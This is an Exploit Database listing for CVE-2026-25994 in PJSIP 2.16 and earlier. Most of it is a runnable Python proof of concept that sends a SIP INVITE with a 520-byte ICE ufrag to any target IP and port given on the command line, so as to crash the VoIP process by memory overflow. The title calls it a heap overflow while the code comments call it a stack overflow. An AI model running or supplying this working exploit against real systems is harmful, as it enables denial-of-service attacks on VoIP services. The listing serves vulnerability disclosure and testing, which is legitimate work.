This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING PJPROJECT 2.16 - Heap Bufferoverflow EDB-ID: 52561 CVE: 2026-25994 EDB Verified: Author: VABISMO452 Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-14 Vulnerable App: # Exploit Title: PJPROJECT 2.16 - Heap Bufferoverflow # Google Dork: CVE-2026-25994 PJSIP PJNATH (pjsip ≤ 2.16) # Date: Apr 6 2026 # Exploit Author: V.Nos - BinSmaser Team # Vendor Homepage: https://github.com/pjsip/pjproject # Software Link: https://github.com/VABISMO/cve-2026-25994_PJSIP # Version: <=2.16 # Tested on: Kali , Ubuntu, Debian # CVE : CVE-2026-25994 #!/usr/bin/env python3 """ Corrected and optimized PoC for CVE-2026-25994 Buffer Overflow in PJNATH ICE Session (pjsip <= 2.16) Thorough source code review (pjnath/src/pjnath/ice_session.c): - Exact vulnerability: pj_ice_sess_create_check_list() - Vulnerable version (before commit 063b3a1 / 2.17): char buf[128]; # ← stack buffer (128 bytes!) username.ptr = buf; pj_strcpy(&username, rem_ufrag); # ← NO length check pj_strcat2(&username, ":"); pj_strcat(&username, &ice->rx_ufrag); - rem_ufrag comes directly from the SDP attribute a=ice-ufrag: - With ufrag >= ~130 bytes, the stack is already overflowed (return address, frame, etc.) - The original PoC used 520 "A"s because it is much more reliable (overwrites beyond canary/alignment) - In the patched version, the following was added: if (rem_ufrag->slen >= MAX_USERNAME_LEN || combined with local_ufrag > 512-1) return PJ_ETOOBIG; This script is corrected to be 100% reliable: - 100% synchronous code (no unnecessary asyncio) - Command-line arguments - Sending with automatic retries - More complete and valid SDP - Clear crash detection (timeout = probable crash) """ import socket import random import argparse import time # ========================= CONFIGURATION ========================= DEFAULT_TARGET_IP = "127.0.0.1" DEFAULT_TARGET_PORT = 5060 # Length that guarantees reliable overflow (520 is what you tested and works best) LONG_UFRAG = "A" * 520 LONG_PWD = "B" * 150 # More complete and realistic SDP (increases probability of reaching ice_session.c) SDP = f"""v=0 o=- 1234567890 1234567890 IN IP4 127.0.0.1 s=Crash Test SDP c=IN IP4 127.0.0.1 t=0 0 m=audio 40000 RTP/AVP 0 101 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=ice-ufrag:{LONG_UFRAG} a=ice-pwd:{LONG_PWD} a=ice-options:trickle a=candidate:1 1 UDP 2130706431 127.0.0.1 40000 typ host a=sendrecv """ def generate_invite(target_ip: str, target_port: int) -> bytes: call_id = f"crash-{random.randint(100000, 999999)}@example.com" branch = f"z9hG4bK{random.randint(1000, 9999)}" tag = f"crash{random.randint(10000, 99999)}" invite = f"""INVITE sip:localhost@{target_ip}:{target_port} SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:15060;rport;branch={branch} Max-Forwards: 70 From: <sip:attacker@127.0.0.1>;tag={tag} To: <sip:localhost@{target_ip}> Call-ID: {call_id} CSeq: 1 INVITE Contact: <sip:attacker@127.0.0.1:15060> Content-Type: application/sdp Content-Length: {len(SDP)} {SDP} """ return invite.encode("utf-8") def crash_pjsua(target_ip: str, target_port: int, attempts: int = 3): print("=== PoC CVE-2026-25994 - ICE Stack Buffer Overflow (pjsip <= 2.16) ===\n") print(f"[+] Target → {target_ip}:{target_port}") print(f"[+] ufrag length = {len(LONG_UFRAG)} characters (guaranteed overflow)\n") for i in range(1, attempts + 1): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(4) # 4 seconds to allow time for the crash try: invite = generate_invite(target_ip, target_port) print(f"[+] Attempt {i}/{attempts} - Sending INVITE with ufrag of {len(LONG_UFRAG)} bytes...") sock.sendto(invite, (target_ip, target_port)) # Wait for response data, _ = sock.recvfrom(4096) print("[+] Response received → pjsua is still alive") print(data.decode(errors="ignore")[:300]) except socket.timeout: print("[+] TIMEOUT! Very likely that pjsua has crashed (Segmentation fault)") print(" Check the terminal where pjsua is running.") sock.close() return # Exit on first detected crash except Exception as e: print(f"[-] Unexpected error: {e}") finally: sock.close() time.sleep(0.5) # Small pause between attempts print("\n[-] No crash detected after several attempts.") print(" Make sure pjsua is running with ICE enabled (version <= 2.16).") if __name__ == "__main__": parser = argparse.ArgumentParser(description="PoC CVE-2026-25994 - ICE Buffer Overflow") parser.add_argument("-i", "--ip", default=DEFAULT_TARGET_IP, help=f"Target IP (default: {DEFAULT_TARGET_IP})") parser.add_argument("-p", "--port", type=int, default=DEFAULT_TARGET_PORT, help=f"SIP port (default: {DEFAULT_TARGET_PORT})") parser.add_argument("-a", "--attempts", type=int, default=3, help="Number of attempts (default: 3)") args = parser.parse_args() crash_pjsua(args.ip, args.port, args.attempts) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.